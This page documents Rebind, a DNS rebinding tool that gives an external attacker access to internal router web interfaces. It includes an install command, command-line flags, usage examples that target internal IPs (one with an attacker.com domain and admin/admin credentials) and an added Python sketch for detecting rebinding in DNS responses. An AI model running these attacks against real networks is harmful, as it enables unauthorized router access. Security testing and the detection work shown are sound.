
Rebind

Rebind is a DNS rebinding tool that implements multiple A record attacks to bypass network restrictions. It targets routers or public IP addresses by providing external access to internal web interfaces.

Description

Rebind provides an external attacker access to a target router’s internal Web interface. This tool works on routers that implement the weak end system model in their IP stack, have specifically configured firewall rules, and bind their Web service to the router’s WAN interface. Remote administration does not need to be enabled for this attack to work. All that is required is that a user inside the target network surf to a Web site that is controlled, or has been compromised, by the attacker.

Although originally written to target home routers, Rebind can be used to target any public (non-RFC1918) IP address. It starts a DNS server on port 53, an attack Web server on port 80, a callback Web server on port 81, and a proxy server on a specified IP and port.

How It Works

Rebind implements the multiple A record DNS rebinding attack. It responds to DNS queries with different IP addresses in successive responses, initially resolving to the attacker's server and then rebinding to the target's internal IP. This tricks the browser into bypassing the same-origin policy, allowing access to internal services such as router web interfaces bound to the WAN interface.
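
Seen from the resolver side, the behaviour described above has two observable shapes: a single answer that mixes an external address with one pointing back at the local network, and a name that first resolves externally and later resolves locally. The following detection sketch is an added example, not part of Rebind or of the original page; the function names, the record format and all sample addresses are constructed assumptions.

```python
import ipaddress

# RFC 1918, loopback and link-local ranges, listed explicitly so the
# documentation addresses used as sample data below count as external.
LOCAL_NETS = [ipaddress.ip_network(n) for n in
              ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
               "127.0.0.0/8", "169.254.0.0/16")]

def is_local(addr, own_wan):
    """True if addr points back into this network or at its own WAN address."""
    ip = ipaddress.ip_address(addr)
    return addr in own_wan or any(ip in net for net in LOCAL_NETS)

def find_rebinding(responses, own_wan):
    """Scan (qname, [A records]) tuples in arrival order.

    Returns a list of (qname, reason) findings:
      mixed-answer: one response holds external and local addresses
      flip:         a name seen as external-only later resolves to local
    """
    seen_external = set()
    findings = []
    for qname, addrs in responses:
        name = qname.rstrip(".").lower()
        local = [a for a in addrs if is_local(a, own_wan)]
        external = [a for a in addrs if not is_local(a, own_wan)]
        if local and external:
            findings.append((name, "mixed-answer"))
        elif local and name in seen_external:
            findings.append((name, "flip"))
        if external:
            seen_external.add(name)
    return findings

# Constructed sample data: 198.51.100.7 stands in for an external server,
# 203.0.113.10 for this network's own WAN address (an assumption the
# defender supplies; filtering RFC 1918 alone would miss a WAN-bound target).
OWN_WAN = {"203.0.113.10"}
SAMPLE = [
    ("www.example.org.", ["198.51.100.20"]),                   # ordinary lookup
    ("a1.rebind.example.", ["198.51.100.7", "203.0.113.10"]),  # mixed answer
    ("b2.rebind.example.", ["198.51.100.7"]),                  # external first
    ("b2.rebind.example.", ["192.168.1.1"]),                   # then internal
    ("printer.lan.", ["192.168.1.50"]),                        # local-only name
]

if __name__ == "__main__":
    for name, reason in find_rebinding(SAMPLE, OWN_WAN):
        print(f"{reason:13} {name}")
```

Because the page notes that Rebind targets the router's public address, the check treats the network's own WAN address as local in addition to the private ranges.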

Installation

sudo apt install rebind

Flags

-i <interface>  Specify the network interface to bind to
-d <fqdn>       Specify your registered domain name
-u <user>       Specify the Basic Authentication user name [admin]
-a <pass>       Specify the Basic Authentication password [admin]
-r <path>       Specify the initial URL request path [/]
-t <ip>         Specify a comma separated list of target IP addresses [client IP]
-n <time>       Specify the callback interval in milliseconds [2000]
-p <port>       Specify the target port [80]

Examples

Conduct the rebind attack using interface eth0 with the specified domain kali.local. This starts a DNS server on port 53, an attack Web server on port 80, a callback Web server on port 81, and a proxy server.
rebind -i eth0 -d kali.local

Within Rebind's interactive mode, show DNS rebinding responses such as [+] 192.168.1.202 kali.local.
dns

Display help and usage information for the dns-rebind tool.
dns-rebind -h

Run rebind with custom Basic Authentication credentials on the specified interface and domain.
rebind -i eth0 -d kali.local -u admin -a admin

Specify target IP addresses for the rebinding attack.
rebind -i eth0 -d example.com -t 192.168.1.1

Use a wireless interface and a custom target port for the attack.
rebind -i wlan0 -d attacker.com -p 8080

Set the initial URL request path to /admin during the attack.
rebind -i eth0 -d kali.local -r /admin
Updated 2026-04-16 (source: kali.org)